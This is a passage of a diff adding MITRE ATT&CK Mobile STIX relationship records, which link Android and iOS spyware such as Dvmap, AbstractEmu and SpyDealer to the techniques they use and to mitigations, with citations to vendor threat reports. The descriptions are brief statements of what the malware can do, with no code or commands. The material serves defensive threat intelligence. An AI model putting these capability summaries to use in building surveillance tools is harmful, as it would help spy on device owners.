"relationship--bdb29822-63c5-4dd0-961b-cdf3f2482adf", + "created": "2023-03-16T18:28:28.144Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:28:28.144Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3e3cad6c-dd73-43c9-bf99-d4796ba97fb1", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf", + "description": "CrowdStrike Global Intelligence Team. (2016). Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "source_name": "CrowdStrike-Android" + } + ], + "modified": "2020-03-20T16:37:06.668Z", + "description": "(Citation: CrowdStrike-Android)", + "relationship_type": "uses", + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a09f8daa-aa02-45f1-8dac-9bea355c9415", + "type": "relationship", + "created": "2020-11-10T17:08:35.819Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-11-10T17:08:35.819Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can access the device’s location and track the device over time.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8f22a4ce-f075-4343-acb0-1d45c56e91e8", + "created": "2022-03-30T18:06:21.355Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Symantec-iOSProfile2", + "url": "https://www.symantec.com/connect/blogs/apple-ios-103-finally-battles-malicious-profiles", + "description": "Brian Duckering. (2017, March 27). Apple iOS 10.3 Finally Battles Malicious Profiles. Retrieved September 24, 2018." + }, + { + "source_name": "Android-TrustedCA", + "url": "https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html", + "description": "Chad Brubaker. (2016, July 7). Changes to Trusted Certificate Authorities in Android Nougat. Retrieved September 24, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile OSes have implemented measures to make it more difficult to trick users into installing untrusted certificates and configurations. iOS 10.3 and higher add an additional step for users to install new trusted CA certificates and configuration profiles. On Android, apps that target compatibility with Android 7 and higher (API Level 24) default to only trusting CA certificates that are bundled with the operating system, not CA certificates that are added by the user or administrator, hence decreasing their susceptibility to successful adversary-in-the-middle attack.(Citation: Symantec-iOSProfile2)(Citation: Android-TrustedCA)", + "modified": "2022-03-30T18:06:21.355Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6209cccd-2877-4941-ac0c-bec3ba7a5544", + "created": "2022-04-05T19:40:25.071Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:40:25.071Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--644a19d3-c94f-40d9-87ac-02ef20b14eda", + "created": "2023-02-06T19:02:00.135Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:16:28.481Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can grant itself microphone permissions.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0cabc5f9-045e-490c-a97f-efe00dbade86", + "type": "relationship", + "created": "2020-01-27T17:05:58.276Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.276Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can record video.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6a5926f3-8c44-4806-83c2-e8ed0be36bc2", + "created": "2022-04-01T15:13:55.124Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be instructed to not open links in applications they don’t recognize.", + "modified": "2022-04-01T15:13:55.124Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01965668-d033-4aca-a8e5-71a07070e266", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d7007bf2-fcd6-4327-9ffb-bdee5bdeb383", + "created": "2022-04-05T20:17:46.149Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:17:46.149Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--393e8c12-a416-4575-ba90-19cc85656796", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eef4ffb7-892d-4d3f-826c-0b78d1f22671", + "created": "2021-02-08T16:36:20.709Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has encrypted C2 communications using AES in CBC mode during Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "modified": "2022-04-18T16:07:26.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0727ac06-5b46-4f79-abe9-63c1b923d383", + "created": "2023-02-06T19:05:56.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:11.541Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has included encoded shell scripts to potentially aid in the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--45505ae7-0e54-4279-82c3-f92f4a832ed9", + "created": "2022-04-06T13:57:38.847Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:38.847Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcb3a139-f644-45c9-8123-dfea0455143a", + "type": "relationship", + "created": "2019-08-09T17:56:05.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.588Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) can record video and take photos via front and rear cameras.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--94e111fa-81d1-4882-ae73-4d6ad6367b9f", + "created": "2022-03-28T19:25:38.355Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates may contain patches that inhibit system software compromises.", + "modified": "2022-03-28T19:25:38.355Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e03b0eb5-32c6-4867-9235-77fe32192983", + "type": "relationship", + "created": "2019-09-04T15:38:56.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.071Z", + "description": " [FlexiSpy](https://attack.mitre.org/software/S0408) can track the device's location.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--947e2398-4565-4ae0-8cc2-fb0ef5f9c73f", + "created": "2019-12-10T16:07:41.083Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:03.081Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can enable installation of apps from unknown sources.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1c7d2d48-ea9a-448f-891f-66f635c95f73", + "type": "relationship", + "created": "2020-07-20T14:12:15.566Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Check Point-Joker", + "url": "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "description": "Hazum, A., Melnykov, B., Wernik, I.. (2020, July 9). New Joker variant hits Google Play with an old trick. Retrieved July 20, 2020." + } + ], + "modified": "2020-07-20T14:12:15.566Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) can collect device notifications.(Citation: Check Point-Joker)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22334426-e99f-4e97-b4dd-17e297da4118", + "created": "2020-12-24T21:55:56.696Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:23:54.777Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has captured SMS and MMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c5db5bb5-9877-43cd-8851-5aa62405dcb2", + "type": "relationship", + "created": "2019-11-21T16:42:48.497Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." + } + ], + "modified": "2019-11-21T16:42:48.497Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can take photos from both the front and back cameras.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f9a0349-ca95-4bde-8d8d-af524ce19bc7", + "created": "2022-04-15T16:00:43.483Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:52:33.829Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can turn off `VerifyApps`, and can grant Device Administrator permissions via commands only, rather than using the UI.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fa1da6db-da32-45d2-98a8-6bbe153166da", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) tracks the device location.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c8559423-10b0-4d5e-9057-65cbfd7ee1c0", + "type": "relationship", + "created": "2021-10-01T14:42:48.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:48.728Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can send an SMS message after the device boots, messages containing logs, messages to adversary-specified numbers with custom content, and can delete all SMS messages on the device.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e5113d45-05bd-499f-a2e0-9edc6d7c03b6", + "created": "2020-09-14T13:35:45.911Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ESET-Twitoor", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Twitoor](https://attack.mitre.org/software/S0302) can be controlled via Twitter.(Citation: ESET-Twitoor)", + "modified": "2022-04-20T17:56:24.292Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "target_ref": "attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--02e4aedc-0674-4598-948b-0a32758af9ca", + "created": "2022-04-01T13:14:43.195Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:14:43.195Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--834c9a7e-6520-486d-ba60-c3a8b2f9eb1a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:28:46.820Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects SMS messages.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6a715733-cde6-4903-b967-35562b584c6f", + "type": "relationship", + "created": "2020-06-02T14:32:31.878Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.878Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can obtain a list of installed non-Apple applications.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--52f7e464-db89-4201-aea8-38d9b44bbd1b", + "type": "relationship", + "created": "2020-12-18T20:14:47.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.314Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has utilized foreground services.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + 